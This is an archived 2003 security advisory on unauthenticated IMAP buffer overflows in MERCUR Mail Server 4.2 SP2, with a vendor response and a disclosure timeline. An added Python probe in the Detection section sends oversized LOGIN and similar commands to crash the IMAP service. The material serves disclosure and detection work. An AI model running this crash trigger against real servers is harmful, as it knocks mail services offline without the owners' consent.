Multiple Buffer Overflow Vulnerabilities Found in MERCUR Mail server v.4.2 (SP2) - IMAP protocol

From: Dennis Rand (derat_private)
Date: Fri Jun 06 2003 - 08:26:32 PDT


    [STATUS, EXAMINE, DELETE, SUBSCRIBE, UNSUBSCRIBE, RENAME, LIST, LSUB, LOGIN,
    CREATE, SELECT]
                          Multiple Buffer Overflow Vulnerabilities
                           Found in MERCUR Mail server v.4.2 (SP2)
                             http://www.atriumsoftwareusa.com/
                             
                                Discovered by Dennis Rand
                                   www.Infowarfare.dk
    ------------------------------------------------------------------------
    
    
    -----[SUMMARY
    Mercur Mail Server is a Windows NT4/2000/XP mail server application
    supporting the RFC standards for POP3, IMAP4 and SMTP. It is a versatile
    application that offers stability, security and scalability, designed for
    organisations of any size, from a small business to an enterprise with
    thousands of employees or customers. Mercur Mail Server supports an
    integrated anti-virus engine by Norman, black list or open relay
    connectivity, ODBC connectivity, and remote Windows GUI and web
    administration access. Mercur Mail Server is marketed as a solution for
    any business.
    
    The problem is a set of buffer overflows in the IMAP4 service, within the
    MERCUR IMAP4-Server (v4.02.09), that cause the service to shut down.
    
    
    
    -----[AFFECTED SYSTEMS
    Vulnerable systems:
     * MERCUR Mailserver 4.2 (SP2), file version 4.2.14.0
    
    Immune systems:
     * MERCUR Mailserver 4.2 (SP2), file version 4.2.15.0 or higher
    
    -----[SEVERITY
    High    -     An attacker is able to cause a denial of service of the
                  IMAP service, and the exception handler record on the
                  stack is overwritten, which allows a system compromise
                  with code execution running as SYSTEM.
                  The reason this is rated HIGH is that there is no need to
                  log in to the system to conduct this type of attack.
             
    
    -----[DESCRIPTION OF WHAT THE VULNERABILITY IS
    The vulnerability is a buffer overflow in the MERCUR IMAP4-Server (v4.02.09).
    When an attacker sends an oversized argument to any of the EXAMINE, DELETE,
    SUBSCRIBE, RENAME, UNSUBSCRIBE, LIST, LSUB, STATUS, LOGIN, CREATE or SELECT
    commands, the buffer overflows.
    There is an upper bound, however: a request of more than about 8000
    characters is rejected by the server outright and nothing happens, so the
    overflow is triggered with arguments below that length.
    
    ---------------------------- [Exploit Code] ----------------------------
         Exploit code has been written but will be made public later, for
         auditing use only, as part of IMAPAuditor, a product being developed
         by www.0x36.org
    ---------------------------- [Exploit Code] ----------------------------
    
    
    When this attack is performed the IMAP service terminates, but the rest of
    the services (SMTP, POP3) keep running.
    The IMAP service has to be started manually before it works again.
    
    
    -----[DETECTION
    MERCUR Mailserver 4.2 (SP2), file version 4.2.14.0, is vulnerable to the
    attacks described above. Earlier versions may be susceptible as well. To
    determine whether a specific installation is vulnerable, check the file
    version of the IMAP server against the Affected Systems section above, or
    send one of the listed commands with an oversized argument (below the
    roughly 8000-character rejection limit) to a test instance and observe
    whether the IMAP service terminates.
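    The following probe is an added example written for this page; it is not
    the advisory author's exploit, nor the IMAPAuditor tool the advisory
    mentions. It builds the kind of request the Description section describes
    (one of the listed commands with an oversized argument, kept under the
    ~8000-character rejection limit) and, for the Detection section, sends it
    to a test instance and reports whether the connection was dropped. It only
    exercises the crash condition and carries no code-execution payload. The
    host address, port, tag and argument lengths are assumptions, not values
    from the advisory.

```python
"""
Added example (not from the advisory or from IMAPAuditor): build the
oversized IMAP4 request the advisory describes and, optionally, send it
to a test server to see whether the IMAP service drops the connection.
Host, port, tag and argument lengths below are assumptions.
"""
import socket

# Commands the advisory lists as overflowing on an oversized argument.
AFFECTED_COMMANDS = (
    "STATUS", "EXAMINE", "DELETE", "SUBSCRIBE", "UNSUBSCRIBE", "RENAME",
    "LIST", "LSUB", "LOGIN", "CREATE", "SELECT",
)

# The advisory reports that requests over roughly 8000 characters are
# rejected outright, so a probe has to stay below this limit.
REJECT_THRESHOLD = 8000


def build_request(command, arg_len, tag="A001", filler="A"):
    """Return one tagged IMAP command line, CRLF-terminated, as bytes.

    The argument is arg_len copies of `filler`. LOGIN, RENAME and STATUS
    normally take further arguments; the advisory does not say which
    argument overflows, so a single oversized argument is used here.
    """
    command = command.upper()
    if command not in AFFECTED_COMMANDS:
        raise ValueError(f"{command} is not one of the affected commands")
    line = f"{tag} {command} {filler * arg_len}\r\n"
    if len(line) > REJECT_THRESHOLD:
        raise ValueError("request would exceed the ~8000-char rejection limit")
    return line.encode("ascii")


def classify(result):
    """Turn a probe() result dict into a one-line verdict."""
    if result["connection_dropped"]:
        return "connection dropped: IMAP service likely terminated, check the host"
    if result["response"] is None:
        return "no answer within timeout: inconclusive"
    return "server answered: still running at this argument length"


def probe(host, port=143, command="LOGIN", arg_len=4000, timeout=5.0):
    """Connect, read the greeting, send one oversized command, record the outcome.

    Only run this against a system you are authorised to test: the advisory
    says a successful attempt stops the IMAP service until it is restarted
    by hand.
    """
    request = build_request(command, arg_len)
    result = {"banner": None, "response": None, "connection_dropped": False}
    with socket.create_connection((host, port), timeout=timeout) as sock:
        result["banner"] = sock.recv(1024).decode("ascii", "replace").strip()
        sock.sendall(request)
        try:
            data = sock.recv(4096)
        except socket.timeout:
            return result            # no reply: response stays None
        except ConnectionError:
            data = b""               # reset by peer: treat as dropped
        if data:
            result["response"] = data.decode("ascii", "replace").strip()
        else:
            result["connection_dropped"] = True
    return result


if __name__ == "__main__":
    # Hypothetical lab target address; change before use.
    print(classify(probe("192.0.2.10", command="LOGIN", arg_len=4000)))
```

    LOGIN is used as the default because the advisory stresses that no
    authentication is needed; the same request shape can be repeated at
    increasing lengths for the other listed commands to find the point where
    the service dies.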
    
    
    -----[WORK AROUNDS
    Update to MERCUR Mailserver 4.2 (SP2), file version 4.2.15.0 or higher.
    
    
    -----[VENDOR RESPONSE
    Dear Dennis,
    Our programmers informed us that they have fixed the problem 
    and now they are testing it. I will inform you when a fix is 
    available, it should be soon.
    Thank you for pointing out this problem to us.
    Sincerely,
    Alex Ribeiro
    
    
    -----[DISCLOSURE TIMELINE
    10/05/2003 Found the Vulnerability, and made an analysis.
    13/05/2003 Reported to Vendor. 
    14/05/2003 Received information from Vendor
    06/06/2003 Public Disclosure.
    
    
    -----[ADDITIONAL INFORMATION
    The vulnerability was discovered and reported by <derat_private> Dennis Rand
    
    -----[DISCLAIMER
    The information in this bulletin is provided "AS IS" without warranty of any
    kind. In no event shall we be liable for any damages whatsoever including
    direct, indirect, incidental, consequential, loss of business profits or
    special damages.
    



    This archive was generated by hypermail 2b30 : Fri Jun 06 2003 - 11:15:18 PDT